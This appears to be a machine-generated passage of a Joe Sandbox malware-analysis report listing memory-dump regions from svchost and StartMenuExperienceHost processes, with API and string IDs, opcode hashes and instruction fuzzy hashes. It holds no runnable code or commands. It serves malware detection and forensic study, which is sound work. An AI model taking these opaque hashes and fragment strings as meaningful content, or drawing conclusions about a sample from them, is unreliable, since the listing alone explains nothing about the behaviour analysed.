• Source File: 0000000C.00000002.3725665270.00007FFAAC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffaac3b0000_StartMenuExperienceHost.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
Strings
Memory Dump Source
• Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
Similarity
• API ID:
• String ID: 6$6$6$6$"r
• API String ID: 0-3979851792
Strings
Memory Dump Source
• Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
Similarity
• API ID:
• String ID: r6
• API String ID: 0-2984296541
Strings
Memory Dump Source
• Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
Similarity
• API ID:
• String ID: :L_^$k:L
• API String ID: 0-2007851088
Strings
Memory Dump Source
• Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
Similarity
• API ID:
• String ID: r6
• API String ID: 0-2984296541
Strings
Memory Dump Source
• Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
Similarity
• API ID:
• String ID: 6
• API String ID: 0-1452363761
                                                                                                                  • Instruction ID: e1f6027e498da151c5bc1ce28f7b5bca51aab12a1e7d7c648ffe48df0d351cbc
                                                                                                                  • Opcode Fuzzy Hash: 363be65e260e8a08b66272d639daa9573d405fe486750914f295ee65547920a5
                                                                                                                  • Instruction Fuzzy Hash: 63017B9480DB818FF345A3385851C31BFE0CF97210B0841BAE8CDC60A7DA08A94887D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000010.00000002.1387065252.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_16_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction ID: fbc3eadb7e2b5f4c04fcbbee2bb14f0a40892a2e308d7e00b6926a4e2e202378
                                                                                                                  • Opcode Fuzzy Hash: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction Fuzzy Hash: 26E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C252F1441B7D50ED3292DE2898418391
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :M_^$k:M
                                                                                                                  • API String ID: 0-4016585720
                                                                                                                  • Opcode ID: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction ID: 2e5200f77bc8caa6f8b73d4f619e0459dec43f71fa5babc607cc66ae9971b45d
                                                                                                                  • Opcode Fuzzy Hash: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction Fuzzy Hash: 3001A75B70A6A949E7027BBDF4518ECBB90DE86335B0843F3D3C9CD1638A14508687C5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction ID: 03a78872e61e0f682091fc4f824b2669d9657efff8b3da78f380d59d0947cafc
                                                                                                                  • Opcode Fuzzy Hash: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction Fuzzy Hash: DE31C861B189494FE798EB7CD45AB79B7C6EB99311F0446BAE04EC32A3DD14DC428381
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction ID: ef30e67f7865a70c3165296498879bc673903bb1f45fb4c0ddfd6c3bb21618b9
                                                                                                                  • Opcode Fuzzy Hash: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction Fuzzy Hash: 6D21D352A19F4A4BF785A7B8981ABB9ABD5EF95701F0883BAE00DC3292DD189C014391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction ID: 1aa24c25051d22b3f5d71c6d14d58a052e784e8871d55d99e2efdc228f96475f
                                                                                                                  • Opcode Fuzzy Hash: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction Fuzzy Hash: 01411872E0AB4A8FE741E76CD4659FCBFB1EF46220B4446B7D14EC71A2DE2894068790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction ID: 42b37b0a8ff372ca2e5bf2bd6d9774ce779862a2add1d0c9a52402a79156d7f9
                                                                                                                  • Opcode Fuzzy Hash: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction Fuzzy Hash: E1512862A0EA864FE356A73C9456AB57BD5DF87220B0985FBD08DC71A3DC0C9C478392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction ID: b0abad84ec44caf543dd20d4c01769ad032e9b714c701f352ea00f7d47798b58
                                                                                                                  • Opcode Fuzzy Hash: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction Fuzzy Hash: 0A41091770B96E89EB007A7CB8519E97F54DF8233574883B7D249CB193C955A04A83D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction ID: 04292c5616556d90c3068f48c092f58c8cc76d4974c37e212b12b94652f208a1
                                                                                                                  • Opcode Fuzzy Hash: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction Fuzzy Hash: 02412861A19A4E9FEB41FB7CD451AEDBBE1EF89300F444AB6D009C7293CD28E446C790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction ID: f63630432f5af67bf2851d2d834f62c6109c15db727bb1e56b4b0e514b5d756f
                                                                                                                  • Opcode Fuzzy Hash: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction Fuzzy Hash: A631C861E59B4E4FE341E76CC0A1DAABF71FF89300B8485A5D44BC33A6EE68A901C745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction ID: e1a3a4f1967b4707192243b6146b1cc9cd6206dc582aa5aa52a4f9a7e3ead381
                                                                                                                  • Opcode Fuzzy Hash: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction Fuzzy Hash: 1B014C9480DB854FF38697385852D31BFF0CF96211B0849ABE8CDC7097E805D94583D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction ID: 3faf859ae5121eade8d7953db2bb38cdb29e84c1f6887b88f240f0a44105647f
                                                                                                                  • Opcode Fuzzy Hash: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction Fuzzy Hash: 32E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C612F1042B7D50ED3292DE2898418391
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 3c23ce600ff40fc1215125fe7a59b47accddc13c6d690e7c9c66bb107a49e92b
                                                                                                                  • Instruction ID: 7f434391a2454d8d23e60da905587043d6ca054094acdb797a697ca3d42c13a6
                                                                                                                  • Opcode Fuzzy Hash: 3c23ce600ff40fc1215125fe7a59b47accddc13c6d690e7c9c66bb107a49e92b
                                                                                                                  • Instruction Fuzzy Hash: 7852A661B29A098FF795E77CD455BB9B7D2EF99300F4449B9E04EC3292DE28EC058381
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction ID: 9a3bb92f9dd86dca30ef1b5b183ab07a69e4bb50cd01bf485f5068b73820f472
                                                                                                                  • Opcode Fuzzy Hash: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction Fuzzy Hash: 7D512151A0EAC54FE786A7788865A75BFE4DF57215B0845FBE0CDC61A3DD088C0AC392
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :M_^$k:M
                                                                                                                  • API String ID: 0-4016585720
                                                                                                                  • Opcode ID: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction ID: 2e5200f77bc8caa6f8b73d4f619e0459dec43f71fa5babc607cc66ae9971b45d
                                                                                                                  • Opcode Fuzzy Hash: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction Fuzzy Hash: 3001A75B70A6A949E7027BBDF4518ECBB90DE86335B0843F3D3C9CD1638A14508687C5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction ID: 03a78872e61e0f682091fc4f824b2669d9657efff8b3da78f380d59d0947cafc
                                                                                                                  • Opcode Fuzzy Hash: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction Fuzzy Hash: DE31C861B189494FE798EB7CD45AB79B7C6EB99311F0446BAE04EC32A3DD14DC428381
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction ID: ef30e67f7865a70c3165296498879bc673903bb1f45fb4c0ddfd6c3bb21618b9
                                                                                                                  • Opcode Fuzzy Hash: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction Fuzzy Hash: 6D21D352A19F4A4BF785A7B8981ABB9ABD5EF95701F0883BAE00DC3292DD189C014391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction ID: 1aa24c25051d22b3f5d71c6d14d58a052e784e8871d55d99e2efdc228f96475f
                                                                                                                  • Opcode Fuzzy Hash: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction Fuzzy Hash: 01411872E0AB4A8FE741E76CD4659FCBFB1EF46220B4446B7D14EC71A2DE2894068790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction ID: 42b37b0a8ff372ca2e5bf2bd6d9774ce779862a2add1d0c9a52402a79156d7f9
                                                                                                                  • Opcode Fuzzy Hash: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction Fuzzy Hash: E1512862A0EA864FE356A73C9456AB57BD5DF87220B0985FBD08DC71A3DC0C9C478392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction ID: b0abad84ec44caf543dd20d4c01769ad032e9b714c701f352ea00f7d47798b58
                                                                                                                  • Opcode Fuzzy Hash: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction Fuzzy Hash: 0A41091770B96E89EB007A7CB8519E97F54DF8233574883B7D249CB193C955A04A83D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction ID: 04292c5616556d90c3068f48c092f58c8cc76d4974c37e212b12b94652f208a1
                                                                                                                  • Opcode Fuzzy Hash: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction Fuzzy Hash: 02412861A19A4E9FEB41FB7CD451AEDBBE1EF89300F444AB6D009C7293CD28E446C790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction ID: f63630432f5af67bf2851d2d834f62c6109c15db727bb1e56b4b0e514b5d756f
                                                                                                                  • Opcode Fuzzy Hash: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction Fuzzy Hash: A631C861E59B4E4FE341E76CC0A1DAABF71FF89300B8485A5D44BC33A6EE68A901C745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction ID: e1a3a4f1967b4707192243b6146b1cc9cd6206dc582aa5aa52a4f9a7e3ead381
                                                                                                                  • Opcode Fuzzy Hash: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction Fuzzy Hash: 1B014C9480DB854FF38697385852D31BFF0CF96211B0849ABE8CDC7097E805D94583D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction ID: 3faf859ae5121eade8d7953db2bb38cdb29e84c1f6887b88f240f0a44105647f
                                                                                                                  • Opcode Fuzzy Hash: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction Fuzzy Hash: 32E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C612F1042B7D50ED3292DE2898418391
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 51fef5abb802c7ca03889b209a4284bdebcef0eaf26f45468052c6da0d3b76e6
                                                                                                                  • Instruction ID: 54df6ef1164afdb320249d6ab92d0e87bcf20d334787e78a66b3add0abc38bad
                                                                                                                  • Opcode Fuzzy Hash: 51fef5abb802c7ca03889b209a4284bdebcef0eaf26f45468052c6da0d3b76e6
                                                                                                                  • Instruction Fuzzy Hash: 8152C961B28E098BF794F778C459AB9B7D2EF99304F5485B9D00EC32D6DE28AC058781
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 70ac903821d8569eedafb377f6a60199a3a81ba2fc51b9dd6893042182f7b771
                                                                                                                  • Instruction ID: bca5c1d949963564969d265b461ee4da6dd2de58a54eee1d12609e361703fd33
                                                                                                                  • Opcode Fuzzy Hash: 70ac903821d8569eedafb377f6a60199a3a81ba2fc51b9dd6893042182f7b771
                                                                                                                  • Instruction Fuzzy Hash: 84517551A1EAC54FE786A7788825A75BFE4DF57215B0844FBE0CDC71E3DE08880AC392
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :L_^$k:L
                                                                                                                  • API String ID: 0-2007851088
                                                                                                                  • Opcode ID: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction ID: 15b5c52e7b881afba9748089209746d372af56e37c5e9830df042887b49080be
                                                                                                                  • Opcode Fuzzy Hash: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction Fuzzy Hash: EF01D41670A69249E7027ABDB4518FCBB90DE86375B4842B3C3C9C9173861450CB83C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 0317371ca1aa09b89fc3225f48f0acb769e78103c828b7e6569e30735bb4d2f7
                                                                                                                  • Instruction ID: 1cb490986950cbedf2ba80facee73020b867763d192680ebc7a403c8305cf09c
